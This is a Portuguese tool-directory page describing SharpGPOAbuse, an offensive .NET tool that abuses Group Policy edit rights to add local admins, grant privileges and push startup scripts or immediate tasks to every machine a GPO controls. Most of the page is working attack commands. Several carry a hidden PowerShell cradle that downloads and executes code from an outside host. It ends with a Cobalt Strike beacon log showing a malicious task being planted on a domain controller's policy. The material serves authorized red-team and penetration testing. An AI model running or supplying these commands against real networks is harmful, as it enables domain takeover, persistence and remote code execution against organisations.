Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpGPOAbuse — SharpGPOAbuse é uma aplicação .NET escrita em C# que pode ser usada para aproveitar os direitos de edição de um usuário em um Objeto de Política de Grupo (GPO) a fim de comprometer os objetos controlados por esse GPO. | Kitploit
Ferramentas/GitHubGitHub/reverseclabs/sharpgpoabuse
Escalada de PrivilégiosMecanismos de PersistênciaExploraçãoMovimento LateralPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHubreverseclabs/sharpgpoabuse

SharpGPOAbuse

SharpGPOAbuse é uma aplicação .NET escrita em C# que pode ser usada para aproveitar os direitos de edição de um usuário em um Objeto de Política de Grupo (GPO) a fim de comprometer os objetos controlados por esse GPO.

Ver Repositório
1.4k155há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpGPOAbuse

SharpGPOAbuse é uma aplicação .NET escrita em C# que pode ser usada para tirar proveito dos direitos de edição de um usuário em um Objeto de Política de Grupo (GPO) para comprometer os objetos controlados por esse GPO.

Mais detalhes podem ser encontrados no seguinte post do blog: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse

Instruções de Compilação

Certifique-se de que os pacotes NuGet necessários estejam instalados corretamente e simplesmente compile o projeto no Visual Studio.

Uso

root@kitploit:~
Usage:
        SharpGPOAbuse.exe <AttackType> <AttackOptions>

Tipos de Ataques

Atualmente, o SharpGPOAbuse oferece suporte às seguintes opções:

OpçãoDescrição
--AddUserRightsAdicionar direitos a um usuário
--AddLocalAdminAdicionar um usuário ao grupo de administradores locais
--AddComputerScriptAdicionar um novo script de inicialização do computador
--AddUserScriptConfigurar um script de logon de usuário
--AddComputerTaskConfigurar uma tarefa imediata do computador
--AddUserTaskAdicionar uma tarefa imediata a um usuário

Opções de Ataque

Adicionando Direitos de Usuário

root@kitploit:~
Opções necessárias para adicionar novos direitos de usuário:
--UserRights
        Define os novos direitos a adicionar a um usuário. Esta opção diferencia maiúsculas de minúsculas e uma lista separada por vírgulas deve ser usada.
--UserAccount
        Define a conta para adicionar os novos direitos.
--GPOName
        O nome do GPO vulnerável.
        
Exemplo:
        SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

Adicionando um Administrador Local

root@kitploit:~
Opções necessárias para adicionar um novo administrador local:
--UserAccount
        Define o nome da conta a ser adicionada ao grupo de administradores locais.
--GPOName
        O nome do GPO vulnerável.

Exemplo:
        SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Configurando um Script de Logon de Computador ou Usuário

root@kitploit:~
Opções necessárias para adicionar um novo script de inicialização de computador ou logon de usuário:
--ScriptName
        Define o nome do novo script de inicialização.
--ScriptContents
        Define o conteúdo do novo script de inicialização.
--GPOName
        O nome do GPO vulnerável.

Exemplo: 
        SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Se você deseja executar o script malicioso apenas em um usuário ou computador específico controlado pelo GPO vulnerável, pode adicionar uma instrução if dentro do script malicioso:

root@kitploit:~
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Configurando uma Tarefa Imediata de Computador ou Usuário

root@kitploit:~
Opções necessárias para adicionar uma nova tarefa imediata de computador ou usuário:

--TaskName
        Define o nome da nova tarefa do computador.
--Author
        Define o autor da nova tarefa (use uma conta DA).
--Command
        Comando a ser executado.
--Arguments
        Argumentos passados para o comando.
--GPOName
        O nome do GPO vulnerável.

Opções Adicionais de Tarefa de Usuário:
--FilterEnabled
        Ativar Filtragem de Destino para tarefas imediatas de usuário.
--TargetUsername
        O usuário a ser alvo. A tarefa maliciosa será executada apenas no usuário especificado. Deve estar no formato <DOMÍNIO>\<NOMEUSUÁRIO>
--TargetUserSID
        O SID do usuário alvo.

Opções Adicionais de Tarefa de Computador:
--FilterEnabled
        Ativar Filtragem de Destino para tarefas imediatas de computador.
--TargetDnsName
        O nome DNS do computador a ser alvo. A tarefa maliciosa será executada apenas no host especificado.
        
Exemplo: 
        SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Se você deseja executar a tarefa maliciosa apenas em um usuário ou computador específico controlado pelo GPO vulnerável, pode usar algo semelhante ao seguinte:

root@kitploit:~
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com

Opções Adicionais

OpçãoDescrição
--DomainControllerDefinir o controlador de domínio alvo
--DomainDefinir o domínio alvo
--ForceSobrescrever arquivos existentes se necessário

Exemplo de Saída

root@kitploit:~
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I
EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
Baixar ferramenta